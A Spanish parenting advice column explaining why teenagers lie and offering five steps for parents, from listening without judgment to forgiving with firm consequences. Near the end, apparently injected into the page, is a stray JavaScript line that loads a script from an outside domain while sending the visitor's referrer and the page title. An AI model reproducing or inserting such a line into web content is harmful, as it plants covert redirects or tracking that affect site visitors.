Por qué mienten los adolescentes y cómo evitarlo

En esta edición de LIFEadvice, Kim y Nicole explican por qué los adolescentes nos mienten y cómo crear un espacio en el cual puedan decirnos la verdad

Pregunta:

(Nuevamente) pescamos a mi hija en una gran mentira. Ya parece que no puedo confiar en lo que me dice, y esto ha sido una enorme traición. Siempre nos llevamos bien, fuimos amigas incluso, y no entiendo por qué ahora me miente en mi propia cara. Además, miente en cosas tontas sobre las que no me parece que tenga sentido mentir. ¿Pueden ayudarme a entenderlo y a recibir sinceridad de mi hija adolescente?

Respuesta:

Entender las razones por las que su hija le miente, le ayudará a no tomarlo como algo personal. También comprenderá cómo frenarlo. La mayoría de los padres toma el comportamiento deshonesto de sus hijos de manera muy personal, como si la mentira fuera un signo de falta de respeto y de rechazo. Muchos de los padres con los que trabajamos se sienten traicionados por sus hijos porque saben que les enseñaron a ser honestos.

El hecho es que ustedes les enseñaron otra cosa, pero esta conducta no tiene que ver con ustedes.

Resista la tentación de tomarlo como algo personal y no deje que se dispare su miedo de no ser una madre o un padre suficientemente bueno. Esto no tiene que ver con un fracaso suyo. Lo que sabemos a través de nuestro trabajo especializado con adolescentes y jóvenes es que mentir suele ser una consecuencia del miedo y del dolor emocional. Los adolescentes no se proponen mentir o engañar, y la mayoría de estos chicos son chicos buenos que saben lo que deberían hacer porque fueron criados con una fuerte orientación moral. Tienen una idea clara del bien y el mal, pero también luchan con el terrible miedo de no ser lo suficientemente buenos.

Este miedo al fracaso genera una necesidad de adornar, exagerar y describir detalles o situaciones de maneras que los hagan quedar bien o sentirse a salvo. Todos sabemos cómo es este miedo a no ser lo bastante buenos. Todos nos comparamos demasiado con otros, y muchos sentimos que de alguna manera somos inútiles. Ese miedo precisamente (que es muy exagerado durante los años de la adolescencia) es el que impulsa nuestro mal comportamiento. Nos hace hacer o decir lo que sea necesario para aquietar el dolor de ese miedo.

Estos chicos de hoy no son inútiles ni son malas personas. Simplemente perdieron su rumbo, tienen miedo y están tomando malas decisiones (básicamente no vivir a la altura de su potencial) porque tienen una autoestima seriamente baja y tienen poca fe en sí mismos.

Hacen todo lo que pueden por encontrar un sentimiento de valor. A veces esto significa alternar con personas que no son la mejor influencia, pero que los validan o los aceptan. Puede significar auto-medicarse con remedios o volcarse al alcohol si eso es lo que se requiere para aplacar el miedo.

A continuación, encontrará algo de lo que puede hacer para transformar la vida de su hija adolescente, frenar el círculo de la mentira y volver a ganar su confianza:

1) Crear un entorno seguro donde pueda ser ella misma sin enjuiciamientos. Si quiere que diga la verdad, tiene que poder manejar la verdad de una manera afectuosa. Aunque esto parezca difícil, crear un espacio donde su hija pueda recobrarse, sentirse y expresarse sin juicios ni críticas es factible. Quizá deba dejar de lado sus grandes expectativas por un tiempo, para poder crear un espacio más protegido donde su hija adolescente pueda hablarle. Tiene que hacerlo para generar un lugar en el cual su hija adolescente le diga qué le está pasando y de dónde proviene su baja autoestima.

La imagen personal y el miedo al fracaso de un adolescente generalmente dictan todas sus decisiones, incluida la opción de mentir. Muchos de ellos tienen pocas aspiraciones en la vida, simplemente porque prefieren apuntar bajo y fallar antes que aplicarse, comprometerse y fallar en grande. Como adultos, esto no tiene sentido para nosotros ya que sabemos que la vida es aprendizaje y que muchas veces fracasamos en nuestro camino al éxito. Lamentablemente, los adolescentes todavía no tienen esa perspectiva.

Se puede generar un espacio protegido para ellos escuchando mucho más que hablando. Quizá le convenga aprender nuestra fórmula para diálogos de reconocimiento (en inglés) para ver cómo hacerlo bien. Poder tener un diálogo de reconocimiento mutuo es fundamental para mantener una buena conexión con su hija.

2. Amarla en el momento de su mala decisión y su mal comportamiento. No importa cuáles sean sus errores ni sus malas decisiones, ame a su hija incondicionalmente. Esto no significa perdonar o aceptar su mal comportamiento. Significa dejar bien claro que su conducta no es aceptable, pero que tampoco cambia el amor que usted le tiene.

Muchos adolescentes con los que trabajamos son inmaduros y no ven claramente las conductas de sus padres. Consideran que el enojo y la frustración de sus padres es una falta de amor por ellos. Es un lugar tremendo para un adolescente, ya que se siente solo y abandonado. Hágale saber claramente a su hija que la quiere, pero al mismo tiempo sin aceptar su mala conducta, y pregúntele con frecuencia qué puede hacer para ayudarla. ¿Cómo podemos estar y apoyarte más?

3. Dejar tiempo y espacio para interacciones positivas. Dado que los adolescentes van y vienen, suele haber poco tiempo para una comunicación saludable y constante. Enseguida, la única comunicación que se tiene se vuelve negativa o basada en el miedo. Esto puede hacer que la idea de hogar se vuelva terrible o indeseable.

Si su hija conoce la diferencia entre el bien y el mal, la mala conducta y las malas decisiones, incluida la mentira, estarán rodeadas de vergüenza y culpa. No obstante, muchos adolescentes en esta etapa están hasta el cuello y no cuentan con los medios necesarios para expresar cómo se sienten o cómo cambiar de camino. También tienen miedo de generar más enojo y rechazo. Esto perpetúa el ciclo de más mentiras, deshonestidad y que los hijos adolescentes estén en cualquier parte menos en la casa.

Si usted quiere cambiar esto, debe crear un ritmo y algunas reglas que establezcan cuándo debe estar su hija en casa. Esto le dará algún control sobre el tiempo para compartir con ella de manera que pueda darse una comunicación positiva. Pese a toda la frustración y la decepción que le causa su conducta, haga un esfuerzo concertado para divertirse, hacer bromas y mostrarle su amor. Escúchela (muchísimo) y asegúrese de honrar y respetar su derecho a tener sus propias opiniones y sentimientos. Hágale saber también cuánto disfruta que esté cerca. El amor gana siempre. Destine, entonces, cada semana, un tiempo para mantener y desarrollar su relación.

4. Alentarla a confiar en el recorrido. Todo sucede en nuestra vida por alguna razón (para enseñarnos algo), inclusive las experiencias de mentiras y engaños que está teniendo actualmente. Adoptar esta perspectiva y confiar en el camino a recorrer le dará una visión más sana de la experiencia. Sea consciente de que este tiempo y esta etapa no durarán para siempre y trate de mantener una actitud de curiosidad, preguntándose todos los días “¿Qué vino a enseñarme esta experiencia?” En vez de “Soy una víctima, esto no debería estar pasándome” o “Estoy fallando como padre o madre”.

Recuerde, mañana será otro día y otra oportunidad para volver a intentarlo. Así funciona el aula de la vida. Esta actitud es muy útil para todos los involucrados. Confíe en que esa hija está en su vida para ayudarla a aprender, a crecer, a adquirir compasión hacia usted misma y los demás. Su hija es su maestra perfecta y usted de ella.

5. Perdonarla, pero con fuertes consecuencias. Cuando se presenta la mentira, perdone rápidamente, pero implemente consecuencias fuertes para evitar que vuelva a producirse. Suspenda privilegios con el auto, el dinero, la electrónica y otros lujos para demostrar que habla en serio. Mentir no es aceptable ahora porque nunca es aceptable siendo adulto.

En este momento, su hija está aprendiendo a andar en bicicleta con rueditas, aprendiendo a ser una persona adulta en el mundo. Es importante que mantenga fuertes las consecuencias ahora para que aprenda las lecciones mientras las lecciones son baratas. Pero perdone y abandone el enojo rápidamente y no deje que la mentira afecte su amor por ella. Es la manera más eficaz de evitar más comportamiento deshonesto.

Si le parece que su hija se descarrila, se aleja de Dios, tiene una actitud exigente o no toma las decisiones adecuadas para su vida, no pase por alto estos comportamientos y busque pronto ayuda de un especialista capacitado y con experiencia, especialmente si tiene alguna sospecha de depresión, ansiedad o de pensamientos suicidas.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado